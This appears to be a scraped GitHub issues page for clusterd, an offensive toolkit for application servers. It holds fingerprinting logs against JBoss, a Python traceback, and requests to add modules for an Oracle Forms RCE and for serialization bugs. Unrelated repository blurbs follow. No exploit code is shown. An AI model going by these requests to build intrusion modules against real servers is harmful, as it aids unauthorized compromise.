[2014-07-23 02:49PM] Fingerprinting completed.
[2014-07-23 02:49PM] Finished at 2014-07-23 02:49PM
A pretty severe RCE vulnerability was disclosed in Oracle's Forms 10g server that looks like it would be trivial to implement in clusterd (https://www.netspi.com/blog/entryid/243/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278). Also I would think this would be a good time to take a look at what other modules related to Oracle application servers that could be implemented in clusterd (SMB hash aux modules, other exploits, etc).
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:40AM] Started at 2014-05-16 11:40AM
[2014-05-16 11:40AM] Servers' OS hinted at windows
[2014-05-16 11:40AM] Fingerprinting host 'x'
[2014-05-16 11:40AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:40AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
Traceback (most recent call last):
File "./clusterd.py", line 119, in <module>
run(options)
File "./clusterd.py", line 92, in run
fingerengine.run()
File "/root/git/clusterd/src/core/fingerprint.py", line 97, in run
matched_fps = self.check_service(service)
File "/root/git/clusterd/src/core/fingerprint.py", line 59, in check_service
matched_fingerprints = self.definitions(self.options.ip, self.options.port, service)
File "/root/git/clusterd/src/core/fingerprint.py", line 32, in definitions
fp = fp.FPrint()
File "/root/git/clusterd/src/platform/jboss/fingerprints/JBossInvoker.py", line 13, in __init__
AttributeError: class JINTERFACES has no attribute 'IN'
Title. Serialize bugs should be added as modules.
right now it doesnt seem possible to pass a vhost parameter. would be handy to do that where i haven an IP but it requires the host variable to talk with the application
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.